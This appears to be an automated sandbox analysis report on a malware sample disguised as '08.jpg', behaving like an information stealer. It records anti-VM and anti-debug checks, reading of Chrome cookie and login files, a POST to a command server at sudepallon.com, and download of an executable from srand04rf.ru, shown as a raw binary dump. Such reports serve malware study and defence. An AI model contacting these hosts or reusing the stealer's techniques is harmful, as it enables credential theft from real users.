08.jpg

Queries for the computername (2 events)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameA July 9, 2021, 9:50 a.m.	computer_name: TEST22-PC	1	1	0
GetComputerNameW July 9, 2021, 9:50 a.m.	computer_name: TEST22-PC	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

This executable has a PDB path (1 event)

pdb_path

c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 9, 2021, 9:50 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://sudepallon.com/8/forum.php

Performs some HTTP requests (4 events)

request	GET http://api.ipify.org/
request	POST http://sudepallon.com/8/forum.php
request	GET http://srand04rf.ru/7hfjsdfjks.exe
request	GET http://api.ipify.org/?format=xml

Sends data using the HTTP POST Method (1 event)

request

POST http://sudepallon.com/8/forum.php

Resolves a suspicious Top Level Domain (TLD) (1 event)

domain

srand04rf.ru

description

Russian Federation domain TLD

Allocates read-write-execute memory (usually to unpack itself) (4 events)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory July 9, 2021, 9:50 a.m.	process_identifier: 2408 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 16384 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00621000 process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory July 9, 2021, 9:50 a.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003d0000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory July 9, 2021, 9:50 a.m.	process_identifier: 2408 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x003e0000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0xffffffff	1	0	0
NtAllocateVirtualMemory July 9, 2021, 9:50 a.m.	process_identifier: 2408 region_size: 73728 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x004f0000 allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE) process_handle: 0xffffffff	1	0	0

Steals private information from local Internet browsers (5 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Web Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local State

Looks up the external IP address (1 event)

domain

api.ipify.org

Creates a suspicious process (1 event)

cmdline

C:\Windows\System32\svchost.exe

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (5 events)

Time & API	Arguments	Status	Return	Repeated
Process32NextW July 9, 2021, 9:50 a.m.	snapshot_handle: 0x000002c4 process_name: pw.exe process_identifier: 2160	1	1	0
Process32NextW July 9, 2021, 9:50 a.m.	snapshot_handle: 0x000002c4 process_name: taskhost.exe process_identifier: 2196	1	1	0
Process32NextW July 9, 2021, 9:50 a.m.	snapshot_handle: 0x000002c4 process_name: SearchProtocolHost.exe process_identifier: 2312	1	1	0
Process32NextW July 9, 2021, 9:50 a.m.	snapshot_handle: 0x000002c4 process_name: 08.jpg process_identifier: 2408	1	1	0
Process32NextW July 9, 2021, 9:50 a.m.	snapshot_handle: 0x000002c4 process_name: svchost.exe process_identifier: 2688	1	1	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 9, 2021, 9:50 a.m.	flags: 0 family: 2	1	0	0

An executable file was downloaded by the process 08.jpg (1 event)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile July 9, 2021, 9:50 a.m.	buffer: MZÿÿ¸@€º´ Í!¸ LÍ!This program cannot be run in DOS mode. $PEL *à/ P&€`@ € P¤d›´R.textDOP`P`.data8`T@@À.rdata¨-p.V@@@/4 ’„@0@.bss@@€`À.idata¤P@0À.CRT8`&@0À.tlsp(@0ÀóÍ´&¼'ƒì1Àf=@MZÇìCD ÇèCD ÇäCD Ç€@D tI£@D¡øCD Àt-Ç$è²=èµ=‹DD‰è¬>ƒ= `C tc1ÀƒÄÃÇ$ è =ëы<@º@PEŠ@uŸ·Qfú t>fúuƒ¹„v„‹‘ø1À Ò•Àérÿÿÿv¼'Ç$ÀQCèÄ@1ÀƒÄÃyt†Lÿÿÿ‹‰è1À É•Àé:ÿÿÿfƒì,¡àCDÇD$@DÇD$@DÇD$@DÇ$@D£@D¡(`C‰D$èâ<ƒÄ,ÃfL$ƒäð1ÀÿqüU‰åWVSQU¤¹ƒìx‹5øCD‰×ó« ö °d¡1ۋx‹5|TDë9Ç„5Ç$èÿփì‰Øð±=8DD ÀuÞ¡<DD1ۃø „¡<DD À„oÇ@D ¡<DDƒø „ Û„1¡`›C ÀtÇD$ÇD$Ç$ÿЃìè¤AÇ$@VCÿxTDƒì£DDÇ$@è<èþ?Ç4DD@èÓ;‹1É ÀuëYt&„Òt,ƒá t'¹ ƒÀ ¶€ú ~ç‰Ëƒó €ú"DËëèv¼'„Òuëv¼'€ú  ƒÀ ¶„Òuñ£0DD‹øCD ÛtöEÐ ¸  ó£`C‹@D4‰4$èý: ۉE‹@DŽl ‰ÃFü‰×‰EŒ ЉE”‰ö¼'‹ƒÃƒÇ‰$èœ:p ‰4$è¹:‰Cü‹Oü‰t$‰$‰L$è“:9}”uʋEŒEÇ‹E£@Dè‘;¡àRD‹@D‰¡@D‰D$¡@D‰D$¡@D‰$èõJ‹ @D£@D É„΋@D Òu èW:¡@DeðY[^_]aüÃf·EÔéÿÿÿ´&¡<DD» ƒø  âýÿÿÇ$è:¡<DDƒø  íýÿÿÇD$`DÇ$`Dèë9 ÛÇ<DD Ïýÿÿ‡8DDéÄýÿÿf‰$ÿ$TDƒìé?ýÿÿÇD$`DÇ$`DÇ<DD è9éxýÿÿ‹Eéàþÿÿ‰$èx9¶¿ƒìÇøCD èž:ƒÄé¶üÿÿ¶ƒìÇøCDè~:ƒÄé–üÿÿ¶ƒì‹D$ ‰$è%9 À”ÀƒÄ¶À÷ØАU‰åƒìø C‰$@D‰D$ègBƒÄ]Ãf.„U‰åƒìø C‰$@D‰D$è<BƒÄ]ÃffffffU‰åSWVƒìHƒz ‰×‰Ëuu؍W‰ñèß.‹ À µ‰]ð_‰Ùè&ƒgw‹G;GtrHU؉OM¬ò@òEèòòHòMàòEØè‹.‰ÙèâÇG òEèòFòEØòMàòNò‹E¬ Àt˜‹MÀòE°òM¸‹]ðë4‰Ù螃g‹]ðƒ, uKu؍W0‰ñè&.‹ Àt8‹MìòEÜòMä‰MÔòMÌòEĉòEÄòM̋EÔòCòK‰CëO,è>ƒg,ƒ#ƒÄH^_[]ÃU‰åSWV1À@9B”Ã1ö9r•Ç ß9B,‹B”Ã9r0¶÷•Ç ߶ÿ1Û ÷;B”Ã!‰Y‰y^_[]ÃU‰åSWVì¤‰Mðj [‰Uì‹r;rtPF8‰Ù½Pÿÿÿ‰B‹ƒÆó¥ƒøt6‰Ù‰E´}¸µPÿÿÿƒø ó¥u M´èCë‹E¸jY}„u¼ Àó¥u ‹Uì먋Eðƒ ëj[U´u„‰×‰Ùó¥‰Ù‰Ö‹}ð‰ƒÇó¥Ä¤^_[]ÃU‰åSWVƒäøƒì0‹r‹B)ð Àt0^‰Z‹>òFòN‹v ÿ‰t$(òL$ òD$uƒÀè‰Þë̃!ë=‹D$(òD$òL$ ‰9‰D$òL$ò$ò$òL$‹D$òAòI‰Aeô^_[]ÃU‰åSWVì„u´‰MԉŰB;B„H‰JòòEÀ‹@‰Eȃ}À„ð ‹EÈòEÀ‰ñ‰E¼òE´è9Q‰Á辏„À„· ‰ñè#Q‰Áè͎ À„¡ ‰Ã‰Ö‰Ájh7—CèY"YZ1ÿ„Àt‰ò鎉]؉u܉u¨uØÆEàÇEä‰ñèˎ‰ñ‰Ç‰U¤è¿Ž‰Æ‰UÐ1Àº¼”C ö•À1É Ò‹U¨•Á9ȉøu71ÿ ö‰E¬t7¸¼”C Àt.‰ñ‰u°‰Ö‹UÐjh¼”Cèæq‰ò‹u°ƒÄ„À‹E¬u ‹UЉljóë‹E¤ ۍu´Eû ÿ„â ۍMØDЉЉúPèæwXƒ}Ø EàMä‹]ÜDÁ¹#Rÿÿ‹8ùC‰Eˆ‹Eˆ ȍ üsCQjYQMˆQÿЃÄ‰Ù‰újXPEˆPèP@YZM؉Ãèl„Ûtu‹E¼òE´}؉ù‰EàòEØèÎO‰ÖMˆ‰ÂVè[¸X‰ùè÷‹E òE˜òUˆòMpÿÿÿ‰ú‰EðòEèòMàòUØè°,‹ pÿÿÿ Àu7‹U̍u´éøýÿÿ‰ñ誋UÌééýÿÿƒeÀMÀèÆ ‹Eԃ Ä„^_[]͕tÿÿÿ‹uԋJòòJ‰òMàòE؉MèòEØòMà‹UèòFòN‰VëµU‰åSWVƒì`‰×]ȉMð‹G;G„ÁH‰OòòEä‹@‰Eìƒ}䄦‹EìòEä‰Ù‰EÐòEÈè´N‰ÖM¬‰ÂVèA·X‰ÙèÝ‹EÄòE¼òU¬òM´M”‰Ú‰EàòEØòMÐòUÈè™+‹E” À„pÿÿÿU˜‹uð‹JòòJ‰òMÐòEȉMØòEÈòMЋUØòFòN‰VëƒeäMäè‹‹Eðƒ ƒÄ`^_[]ÃU‰åSWVƒì,‹‹r‰Mì‹B‹J)މEð‰Mè ötFK ‰ Š‹B€ûAr€û[rIˆß€ÇŸ€ÿsëDˆß€ÇЀÿ rA‹}ð:t‹}è:t€û=u@N‰Ë‰B붋EìÆël±>ë±?ë± ‰Mðë‰Ù€Á¿ë‰Ù€Á¹ë‰Ù€ÁÇEð request_handle: 0x00cc000c	1	1	0

Yara rule detected in process memory (11 events)

description	Communications use DNS				rule	Network_DNS
description	Communications over RAW Socket				rule	Network_TCP_Socket
description	Take ScreenShot				rule	ScreenShot
description	(no description)				rule	DebuggerCheck__GlobalFlags
description	(no description)				rule	DebuggerCheck__QueryInfo
description	(no description)				rule	DebuggerHiding__Thread
description	(no description)				rule	DebuggerHiding__Active
description	(no description)				rule	ThreadControl__Context
description	(no description)				rule	SEH__vectored
description	Checks if being debugged				rule	anti_dbg
description	Bypass DEP				rule	disable_dep

Queries for potentially installed applications (50 out of 89 events)

Time & API	Arguments	Status	Return	Repeated
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall base_handle: 0x80000002 key_handle: 0x000002c8 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40 base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Office14.PROPLUS	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1	0	0
RegOpenKeyExW July 9, 2021, 9:50 a.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x80000002 key_handle: 0x00000298 options: 0 access: 0x00000001 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1	0	0
